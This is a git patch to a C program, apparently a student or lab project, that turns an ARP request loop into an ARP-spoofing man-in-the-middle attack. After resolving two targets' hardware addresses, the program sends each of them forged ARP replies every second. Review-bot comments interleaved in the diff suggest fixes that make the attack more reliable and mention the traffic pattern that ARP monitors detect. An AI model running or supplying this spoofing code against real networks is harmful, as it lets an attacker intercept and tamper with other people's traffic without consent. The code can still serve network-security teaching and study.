From f8320a04ce735976f90fea96aa1b84c5a71bc9ec Mon Sep 17 00:00:00 2001
From: Dimitri Lozeve
Date: Fri, 27 May 2016 16:21:09 +0200
Subject: [PATCH] Effective man-in-the-middle attack using replies
---
 arp.c | 6 +-----
 arp_mitm.c | 21 +++++++++++++++++++--
 2 files changed, 20 insertions(+), 7 deletions(-)
diff --git a/arp.c b/arp.c
index 5c2278a..1f2b27c 100644
--- a/arp.c
+++ b/arp.c
@@ -183,13 +183,9 @@ int send_arp_reply(int sockfd, int ifindex, struct sockaddr_in *sender_ip, unsig
 */
 int listen_arp_frame(int sockfd, struct ether_arp *result)
 {
-
- char buffer[10000];
- result = (struct ether_arp *)buffer;
-
 int count = 0;
- while (recv(sockfd, buffer, sizeof(buffer), 0) && count < 10) {
+ while (recv(sockfd, result, sizeof(struct ether_arp), 0) && count < 20) {
 /* skip to the next frame if it's not an ARP REPLY */
 if (ntohs (result->arp_op) != ARPOP_REPLY) {
 ++count;
diff --git a/arp_mitm.c b/arp_mitm.c
index c9cec07..c643263 100644
--- a/arp_mitm.c
+++ b/arp_mitm.c
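Review bot: The new loop condition in `listen_arp_frame` (arp.c), `recv(sockfd, result, sizeof(struct ether_arp), 0) && count < 20`, treats every non-zero return as a received frame, so a failed `recv()` (-1) or a datagram shorter than `struct ether_arp` still reaches `ntohs(result->arp_op)` and reads whatever the caller's buffer happened to hold. Keep the byte count and require a full struct, testing the frame budget first so no extra blocking read happens once it is used up: `ssize_t n;` and `while (count < 20 && (n = recv(sockfd, result, sizeof *result, 0)) >= (ssize_t)sizeof *result) {`. Writing straight into `result` also assumes the socket delivers the ARP payload without a link-layer header, which this diff does not show; a short comment stating that assumption would help. The rest of `listen_arp_frame`, including what it returns when the budget runs out, is outside this hunk.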
@@ -121,10 +121,27 @@ int main(int argc, char **argv)
 /* ====================================================================== */
+ send_arp_request(sockfd, ifindex, ipaddr2, macaddr, target1_ip);
+
+ struct ether_arp reply1;
+ listen_arp_frame(sockfd, &reply1);
+ unsigned char *macaddr1 = reply1.arp_sha;
+ printf("Target 1 hardware address: %02x:%02x:%02x:%02x:%02x:%02x\n",
+ macaddr1[0],macaddr1[1],macaddr1[2],
+ macaddr1[3],macaddr1[4],macaddr1[5]);
+
+ send_arp_request(sockfd, ifindex, ipaddr1, macaddr, target2_ip);
+ struct ether_arp reply2;
+ listen_arp_frame(sockfd, &reply2);
+ unsigned char *macaddr2 = reply2.arp_sha;
+ printf("Target 2 hardware address: %02x:%02x:%02x:%02x:%02x:%02x\n",
+ macaddr2[0],macaddr2[1],macaddr2[2],
+ macaddr2[3],macaddr2[4],macaddr2[5]);
+
 while(1) {
- send_arp_request(sockfd, ifindex, ipaddr1, macaddr, target2_ip);
+ send_arp_reply(sockfd, ifindex, ipaddr1, macaddr, target2_ip, macaddr2);
 sleep(1);
- send_arp_request(sockfd, ifindex, ipaddr2, macaddr, target1_ip);
+ send_arp_reply(sockfd, ifindex, ipaddr2, macaddr, target1_ip, macaddr1);
 sleep(1);
 }
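Review bot: Both `listen_arp_frame(sockfd, &reply1);` and `listen_arp_frame(sockfd, &reply2);` discard the return value, and `reply1`/`reply2` are uninitialised stack structs, so when no ARP reply is captured `macaddr1`/`macaddr2` point at indeterminate bytes that are printed and then handed to `send_arp_reply` on every loop iteration. Zero-initialise the structs (`struct ether_arp reply1 = {0};`) and stop when the call fails, e.g. `if (listen_arp_frame(sockfd, &reply1) != 0) { fprintf(stderr, "no ARP reply from target 1\n"); return 1; }`; the function's return convention is not visible in this diff, so the comparison has to be checked against arp.c. A one-line comment above `while(1)` stating that the loop emits unsolicited ARP replies once per second would also document the traffic pattern that ARP monitors and Dynamic ARP Inspection key on. `main` starts and ends outside the hunk.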